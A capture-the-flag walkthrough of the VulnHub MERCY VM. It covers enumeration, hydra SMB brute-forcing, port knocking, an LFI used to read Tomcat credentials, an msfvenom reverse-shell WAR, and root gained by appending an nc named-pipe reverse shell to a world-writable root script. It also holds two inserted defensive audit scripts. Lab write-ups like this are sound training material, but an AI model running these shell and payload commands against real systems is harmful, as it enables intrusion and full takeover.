This post documents the complete walkthrough of digitalworld.local: MERCY, a boot2root VM created by Donavan, and hosted at VulnHub. If you are uncomfortable with spoilers, please stop reading now.

Background

The author feels bittersweet about this box. On one hand, it was a box designed as a dedication to the sufferance put through by the Offensive Security team for PWK. I thought I would pay it forward by creating a vulnerable machine too. This is not meant to be a particularly difficult machine, but is meant to bring you through a good number of enumerative steps through a variety of techniques.

Information Gathering

Let’s start with an nmap scan to establish which services are available on the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.20.130
...
PORT     STATE    SERVICE     REASON              VERSION
22/tcp   filtered ssh         port-unreach ttl 64
53/tcp   open     domain      syn-ack ttl 64      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp   filtered http        port-unreach ttl 64
110/tcp  open     pop3        syn-ack ttl 64      Dovecot pop3d
|_pop3-capabilities: SASL UIDL CAPA STLS PIPELINING AUTH-RESP-CODE RESP-CODES TOP
|_ssl-date: TLS randomness does not represent time
139/tcp  open     netbios-ssn syn-ack ttl 64      Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open     imap        syn-ack ttl 64      Dovecot imapd (Ubuntu)
|_imap-capabilities: IMAP4rev1 IDLE OK listed have post-login more capabilities ENABLE Pre-login LOGINDISABLEDA0001 LITERAL+ LOGIN-REFERRALS SASL-IR STARTTLS ID
|_ssl-date: TLS randomness does not represent time
445/tcp  open     netbios-ssn syn-ack ttl 64      Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open     ssl/imaps?  syn-ack ttl 64
|_ssl-date: TLS randomness does not represent time
995/tcp  open     ssl/pop3s?  syn-ack ttl 64
|_ssl-date: TLS randomness does not represent time
8080/tcp open     http        syn-ack ttl 64      Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

Whoa! Samba is up. Haven’t seen that in a while. Along with it, you can also see 22/tcp and 80/tcp filtered by the firewall. In any case, let’s focus on the Apache Tomcat first since nmap finds the presence of a disallowed entry /tryharder/tryharder in robots.txt.

[screenshot]

Looks like base64 to me. Let’s decode it and see what it says.

[screenshot]

Duh?! Nothing useful at the moment.

Now, let’s switch our attention to the Tomcat installation.

[screenshot]

From my experience, entering the manager webapp requires authentication. I’m not even going to try that, having no information about usernames and passwords whatsoever.

Tomcat is a shit-show. Time to go over to Samba.

Samba 4.3.11

One can list the shares available on Samba with smbclient -L like so.

[screenshot]

What do we have here? A Samba share! Woohoo. Let’s see if we can mount it without credentials.

[screenshot]

Oops! I recall that hydra can brute-force SMB logins online. Time to give it a shot.

I’m assuming the username is qiu.

[screenshot]

That was fast!

[screenshot]

Not too bad, I must say.

Open Sesame

The .private directory offers some important system information as follows.

[screenshot]

Well well well. Port-knocking. Let’s write a port-knocking script, using nmap to do the deed.

knock.sh
#!/bin/bash
# Usage: ./knock.sh <target> <sequence> [<sequence> ...]
# Each sequence is a comma-separated list of ports, knocked in the order given,
# e.g. ./knock.sh 192.168.20.130 1,2,3 4,5,6

TARGET=$1
shift

for ports in "$@"; do
    echo "[*] Trying sequence $ports..."
    for p in $(tr ',' ' ' <<<"$ports"); do
        # one probe per port, no retries, so the knock order is preserved
        nmap -n -v0 -Pn --max-retries 0 -p "$p" "$TARGET"
    done
done

Open HTTP

[screenshot]

Open SSH

[screenshot]

With two more open ports, let’s get down to business.

[screenshot]

I’m not amused… Moving on with the exploration, I find RIPS 0.53 installed, as follows.

[screenshot]

According to EDB-ID 18660, RIPS 0.53 is susceptible to multiple local file inclusion (LFI) vulnerabilities. Let’s check it out.

[screenshot]

It’s an LFI alright.

Tomcat Revisit

We can expose the passwords in tomcat-users.xml by making use of the LFI vulnerability.

[screenshot]

Armed with the credentials, we can now log in to the manager webapp to deploy our evil webapp, a WAR file that allows a reverse shell callback.
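An added defender's check, not part of this walkthrough: a Python audit of a tomcat-users.xml file that flags accounts holding manager or host-manager roles whose password is stored in clear rather than as a Tomcat digest. The embedded file is a constructed sample with made-up usernames, passwords and digest; the PRIVILEGED_ROLES set and the digest-shape regex are my assumptions about what counts as privileged and hashed, not something taken from the page.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of Tomcat's conf/tomcat-users.xml. The
# usernames, passwords and digest below are made up for this example.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="tomcat"/>
  <user username="admin"  password="example-password-1" roles="manager-gui,manager-script"/>
  <user username="deploy" password="example-password-2" roles="manager-script"/>
  <user username="ops"    password="6ef0dbe8e8f8c1d9b6c0e8a4b1f3a9d8e7c6b5a4" roles="manager-gui"/>
  <user username="reader" password="example-password-3" roles="tomcat"/>
</tomcat-users>
"""

# Roles that allow deploying or managing webapps through the manager and
# host-manager applications (assumption: this is the set treated as privileged).
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}

# Heuristic (assumption): a long hex string, or Tomcat's "salt$iterations$hex"
# digest layout, is treated as hashed; anything else is treated as clear text.
DIGEST_RE = re.compile(r"^(?:[0-9a-f]{32,}|[0-9a-f]*\$\d+\$[0-9a-f]{32,})$", re.IGNORECASE)


def _local_name(tag):
    """Strip the XML namespace so the check works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per <user> element: its privileged roles and whether
    its password attribute is stored in clear."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if _local_name(elem.tag) != "user":
            continue
        # Tomcat accepts both "username" and "name" for this attribute.
        username = elem.get("username") or elem.get("name") or "?"
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        password = elem.get("password") or ""
        findings.append({
            "username": username,
            "privileged_roles": sorted(roles & PRIVILEGED_ROLES),
            "plaintext_password": bool(password) and DIGEST_RE.match(password) is None,
        })
    return findings


def risky_users(xml_text):
    """Usernames that can deploy code to Tomcat and whose password is readable in
    clear: exactly what a file-read bug such as an LFI turns into a full compromise."""
    return [f["username"] for f in audit_tomcat_users(xml_text)
            if f["privileged_roles"] and f["plaintext_password"]]


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
    print("risky:", risky_users(SAMPLE_TOMCAT_USERS))
```

Point the script at a real conf/tomcat-users.xml by reading the file into `audit_tomcat_users()`; on the sample, `admin` and `deploy` are reported as risky while `ops` (digested password) and `reader` (no manager role) are not. The fix on the server side is to digest the stored passwords and to keep manager roles off accounts that do not need them, so that a file-read bug alone does not hand out deployment rights.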

[screenshot]

We can use msfvenom to generate such a WAR file like so.

# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f war -o evil.war

By the way, we are dealing with a 32-bit Ubuntu.

[screenshot]

I’ve successfully deployed the webapp.

[screenshot]

Set up your nc listener, then look for the name of the JSP page to access inside the WAR file like so.

[screenshot]

To access the malicious webapp, enter the following into your browser’s address bar:

http://192.168.20.130/evil/tudvpurwgjh.jsp

I humbly present a low-privilege shell.

[screenshot]

Before I forget, the proof of a low-privilege shell is at /local.txt.

[screenshot]

Privilege Escalation

I found that I can log in to fluffy’s account with the password retrieved from tomcat-users.xml, and during enumeration I also found a way to escalate privilege to root.

There’s a script at /home/fluffy/.private/secrets/timeclock that runs every three minutes as root to write the current date to /var/www/html/time. The script is world-writable.
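As an added example, not from the original post: a small Python check for the class of misconfiguration just described, a script executed as root that an unprivileged user can modify. build_sample_tree() constructs a throwaway stand-in for the .private/secrets directory (its file names, contents and permissions are made up for the demonstration), and world_writable_root_scripts() reports files that are world-writable or that live in a world-writable directory without the sticky bit.

```python
import os
import stat
import tempfile


def world_writable_root_scripts(paths):
    """Return [(path, [reasons])] for every path an unprivileged user could alter:
    the file itself is world-writable, or its parent directory is world-writable
    without the sticky bit (so the file can be replaced). Missing paths are skipped."""
    findings = []
    for path in paths:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            continue
        reasons = []
        if st.st_mode & stat.S_IWOTH:
            reasons.append("file is world-writable")
        parent = os.stat(os.path.dirname(path) or ".")
        if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
            reasons.append("parent directory is world-writable without sticky bit")
        if reasons:
            findings.append((path, reasons))
    return findings


def build_sample_tree():
    """Constructed layout standing in for /home/fluffy/.private/secrets: one safe
    script (0755) and one world-writable script (0777). Returns (safe, weak).
    The script body is a made-up stand-in, not the real timeclock contents."""
    base = tempfile.mkdtemp(prefix="timeclock-demo-")
    secrets = os.path.join(base, "secrets")
    os.mkdir(secrets)
    os.chmod(secrets, 0o755)  # set explicitly so the umask cannot change the outcome
    safe = os.path.join(secrets, "timeclock_safe")
    weak = os.path.join(secrets, "timeclock")
    for p in (safe, weak):
        with open(p, "w") as f:
            f.write("#!/bin/sh\ndate > /var/www/html/time\n")
    os.chmod(safe, 0o755)
    os.chmod(weak, 0o777)
    return safe, weak


def format_report(findings):
    """One line per finding, in the style of a quick audit script."""
    return "\n".join(f"[!] {path}: {'; '.join(reasons)}" for path, reasons in findings)


if __name__ == "__main__":
    safe_path, weak_path = build_sample_tree()
    report = world_writable_root_scripts([safe_path, weak_path])
    print(format_report(report) or "[+] nothing world-writable")
```

In practice you would feed `world_writable_root_scripts()` the command paths pulled from root's crontab and the cron.* directories (an assumption about where such a periodic job is defined; the page does not say how timeclock is scheduled). Any hit means a local user can make root execute their own commands on the next run, which is precisely the escalation used in this box; the fix is `chmod o-w` on the script and its directory and root ownership of both.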

I append the following command to the script.

$ echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.20.128 5555 1>/tmp/p" >> timeclock

Set up another nc listener at 5555/tcp. Three minutes later, I have a root shell.

[screenshot]

Before I forget, here’s the proof that I’m root.

[screenshot]

:dancer: